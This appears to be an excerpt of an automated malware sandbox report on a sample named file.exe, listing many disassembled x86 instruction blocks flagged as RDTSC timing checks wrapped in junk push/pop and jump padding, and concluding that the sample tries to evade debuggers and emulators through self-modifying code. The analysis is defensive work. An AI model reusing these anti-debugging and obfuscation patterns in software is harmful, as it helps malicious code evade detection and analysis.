Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D1018E second address: 4D101F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b pushad 0x0000000c mov eax, 0C7AFD13h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F9558C38A05h 0x00000018 add si, 13D6h 0x0000001d jmp 00007F9558C38A01h 0x00000022 popfd 0x00000023 popad 0x00000024 popad 0x00000025 mov ebx, dword ptr [ebp+10h] 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b pushfd 0x0000002c jmp 00007F9558C389FAh 0x00000031 and eax, 63E421F8h 0x00000037 jmp 00007F9558C389FBh 0x0000003c popfd 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D101F2 second address: 4D10224 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, 3E2D72C5h 0x0000000b popad 0x0000000c xchg eax, esi 0x0000000d jmp 00007F95588494B0h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F95588494ACh 0x0000001b mov si, 2921h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10224 second address: 4D102E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 pushfd 0x00000006 jmp 00007F9558C38A09h 0x0000000b sub si, 5AA6h 0x00000010 jmp 00007F9558C38A01h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, esi 0x0000001a jmp 00007F9558C389FEh 0x0000001f mov esi, dword ptr [ebp+08h] 0x00000022 pushad 0x00000023 push esi 0x00000024 mov ax, bx 0x00000027 pop edi 0x00000028 jmp 00007F9558C38A06h 0x0000002d popad 0x0000002e xchg eax, edi 0x0000002f pushad 0x00000030 mov edx, eax 0x00000032 pushfd 0x00000033 jmp 00007F9558C389FAh 0x00000038 sbb ax, 45D8h 0x0000003d jmp 00007F9558C389FBh 0x00000042 popfd 0x00000043 popad 0x00000044 push eax 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007F9558C389FFh 0x0000004c xor ax, 689Eh 0x00000051 jmp 00007F9558C38A09h 0x00000056 popfd 0x00000057 mov bh, cl 0x00000059 popad 0x0000005a xchg eax, edi 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D102E7 second address: 4D102EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D102EC second address: 4D102F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D102F2 second address: 4D102F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D102F6 second address: 4D102FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D102FA second address: 4D10326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b mov ch, 0Ah 0x0000000d mov ecx, edi 0x0000000f popad 0x00000010 je 00007F95CAA677B1h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F95588494B4h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10326 second address: 4D103A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 pushfd 0x00000007 jmp 00007F9558C389FAh 0x0000000c sbb ecx, 235F8F58h 0x00000012 jmp 00007F9558C389FBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000022 pushad 0x00000023 movzx ecx, dx 0x00000026 pushfd 0x00000027 jmp 00007F9558C38A01h 0x0000002c sbb si, D2F6h 0x00000031 jmp 00007F9558C38A01h 0x00000036 popfd 0x00000037 popad 0x00000038 je 00007F95CAE56CA0h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F9558C38A08h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D103A3 second address: 4D103A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D103A9 second address: 4D103AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D103AF second address: 4D103E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F95588494B2h 0x00000012 jmp 00007F95588494B5h 0x00000017 popfd 0x00000018 push eax 0x00000019 push edx 0x0000001a movzx esi, bx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D103E9 second address: 4D1041D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 or edx, dword ptr [ebp+0Ch] 0x0000000a jmp 00007F9558C38A05h 0x0000000f test edx, 61000000h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F9558C389FDh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D1041D second address: 4D10423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10423 second address: 4D10427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10427 second address: 4D10476 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F95CAA676EEh 0x00000011 jmp 00007F95588494B6h 0x00000016 test byte ptr [esi+48h], 00000001h 0x0000001a pushad 0x0000001b mov dh, ah 0x0000001d mov bh, 0Bh 0x0000001f popad 0x00000020 jne 00007F95CAA676E1h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 movsx ebx, cx 0x0000002c movzx esi, bx 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10476 second address: 4D1048B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9558C38A01h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D1048B second address: 4D1049C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test bl, 00000007h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D1049C second address: 4D104A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00995 second address: 4D009C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, ebx 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F95588494AAh 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F95588494B0h 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F95588494AAh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D009C9 second address: 4D009D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C389FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D009D8 second address: 4D00ABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 call 00007F95588494B0h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F95588494B0h 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 mov eax, 60BC114Dh 0x0000001c popad 0x0000001d mov esi, dword ptr [ebp+08h] 0x00000020 jmp 00007F95588494B4h 0x00000025 sub ebx, ebx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F95588494B7h 0x0000002e adc eax, 2282CC5Eh 0x00000034 jmp 00007F95588494B9h 0x00000039 popfd 0x0000003a movzx eax, di 0x0000003d popad 0x0000003e test esi, esi 0x00000040 jmp 00007F95588494B3h 0x00000045 je 00007F95CAA6EDBEh 0x0000004b jmp 00007F95588494B6h 0x00000050 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000057 pushad 0x00000058 mov ah, 70h 0x0000005a popad 0x0000005b mov ecx, esi 0x0000005d jmp 00007F95588494B5h 0x00000062 je 00007F95CAA6ED95h 0x00000068 pushad 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00ABE second address: 4D00B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov ebx, eax 0x00000007 popad 0x00000008 test byte ptr [76FB6968h], 00000002h 0x0000000f jmp 00007F9558C38A00h 0x00000014 jne 00007F95CAE5E2CFh 0x0000001a pushad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e mov ch, 8Eh 0x00000020 popad 0x00000021 mov eax, edx 0x00000023 popad 0x00000024 mov edx, dword ptr [ebp+0Ch] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov edx, eax 0x0000002c call 00007F9558C38A06h 0x00000031 pop esi 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00B0D second address: 4D00B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 call 00007F95588494B3h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 jmp 00007F95588494B4h 0x00000015 mov dword ptr [esp], ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00B47 second address: 4D00B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9558C38A03h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00B5F second address: 4D00B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00B65 second address: 4D00B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00B69 second address: 4D00B87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F95588494B3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00B87 second address: 4D00C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9558C389FFh 0x00000009 sub eax, 1269D16Eh 0x0000000f jmp 00007F9558C38A09h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F9558C38A00h 0x0000001b adc eax, 7A6794E8h 0x00000021 jmp 00007F9558C389FBh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a mov dword ptr [esp], ebx 0x0000002d jmp 00007F9558C38A06h 0x00000032 push dword ptr [ebp+14h] 0x00000035 pushad 0x00000036 mov ax, B31Dh 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F9558C38A08h 0x00000041 sbb cl, FFFFFFA8h 0x00000044 jmp 00007F9558C389FBh 0x00000049 popfd 0x0000004a movzx eax, bx 0x0000004d popad 0x0000004e popad 0x0000004f push dword ptr [ebp+10h] 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 pushfd 0x00000056 jmp 00007F9558C389FCh 0x0000005b sub ah, 00000008h 0x0000005e jmp 00007F9558C389FBh 0x00000063 popfd 0x00000064 pushad 0x00000065 popad 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00C83 second address: 4D00C9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00C9E second address: 4D00CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F9558C38A09h 0x0000000a xor eax, 142E41E6h 0x00000010 jmp 00007F9558C38A01h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10AD9 second address: 4D10B24 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F95588494B5h 0x00000008 add cx, 7106h 0x0000000d jmp 00007F95588494B1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007F95588494B1h 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10B24 second address: 4D10B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10B28 second address: 4D10B3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10B3B second address: 4D10B53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9558C38A04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10B53 second address: 4D10B6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10B6C second address: 4D10B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D10B70 second address: 4D10B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9067A second address: 4D906F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C389FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ax, 864Bh 0x0000000f mov eax, 70A43C27h 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F9558C38A08h 0x0000001e jmp 00007F9558C38A05h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F9558C38A00h 0x0000002a xor ecx, 34054CE8h 0x00000030 jmp 00007F9558C389FBh 0x00000035 popfd 0x00000036 popad 0x00000037 pop ebp 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D906F2 second address: 4D906F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D906F6 second address: 4D906FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D8081F second address: 4D8084B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F95588494B8h 0x0000000b mov eax, 0A2ED331h 0x00000010 pop esi 0x00000011 popad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D8084B second address: 4D8084F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D8084F second address: 4D80855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80855 second address: 4D80870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C389FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80870 second address: 4D808A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F95588494AEh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D808A0 second address: 4D808A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2024C second address: 4D20250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20250 second address: 4D20256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D20256 second address: 4D2025C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D2025C second address: 4D2026B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ch, 2Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80CD0 second address: 4D80D2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c jmp 00007F95588494B0h 0x00000011 push dword ptr [ebp+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F95588494ADh 0x0000001d adc esi, 442450C6h 0x00000023 jmp 00007F95588494B1h 0x00000028 popfd 0x00000029 mov bl, al 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D3071C second address: 4D30793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9558C389FFh 0x00000008 mov eax, 7B758F0Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F9558C389FBh 0x00000018 xor cx, 3D1Eh 0x0000001d jmp 00007F9558C38A09h 0x00000022 popfd 0x00000023 jmp 00007F9558C38A00h 0x00000028 popad 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 call 00007F9558C38A07h 0x00000035 pop esi 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D30793 second address: 4D30851 instructions: 0x00000000 rdtsc 0x00000002 mov di, 8C8Ch 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F95588494B5h 0x0000000d mov ecx, 58634AA7h 0x00000012 pop eax 0x00000013 popad 0x00000014 mov eax, dword ptr [eax] 0x00000016 jmp 00007F95588494AAh 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007F95588494ABh 0x00000024 pop eax 0x00000025 jmp 00007F95588494B6h 0x0000002a push 51A2D765h 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F95588494B7h 0x00000036 or ch, FFFFFFFEh 0x00000039 jmp 00007F95588494B9h 0x0000003e popfd 0x0000003f popad 0x00000040 add dword ptr [esp], 254DD69Bh 0x00000047 jmp 00007F95588494ADh 0x0000004c mov eax, dword ptr fs:[00000000h] 0x00000052 pushad 0x00000053 mov dh, ah 0x00000055 mov ah, dl 0x00000057 popad 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c mov edi, 702CF240h 0x00000061 push edi 0x00000062 pop ecx 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D30851 second address: 4D3086E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9558C38A02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D3086E second address: 4D30872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D30872 second address: 4D30876 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D30876 second address: 4D3087C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D3087C second address: 4D30892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9558C38A02h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D30892 second address: 4D308AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov ecx, edi 0x0000000c movsx ebx, si 0x0000000f popad 0x00000010 sub esp, 1Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D308AB second address: 4D308B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D308B1 second address: 4D308B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D308B7 second address: 4D308BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D308BB second address: 4D308EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F95588494AAh 0x0000000e push eax 0x0000000f jmp 00007F95588494ABh 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F95588494B0h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D308EF second address: 4D308F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D308F5 second address: 4D3092F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 jmp 00007F95588494B8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F95588494B7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D3092F second address: 4D30953 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9558C389FCh 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9558C389FAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D30953 second address: 4D30962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95588494ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D30962 second address: 4D30980 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9558C389FFh 0x00000008 push ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D30980 second address: 4D30984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
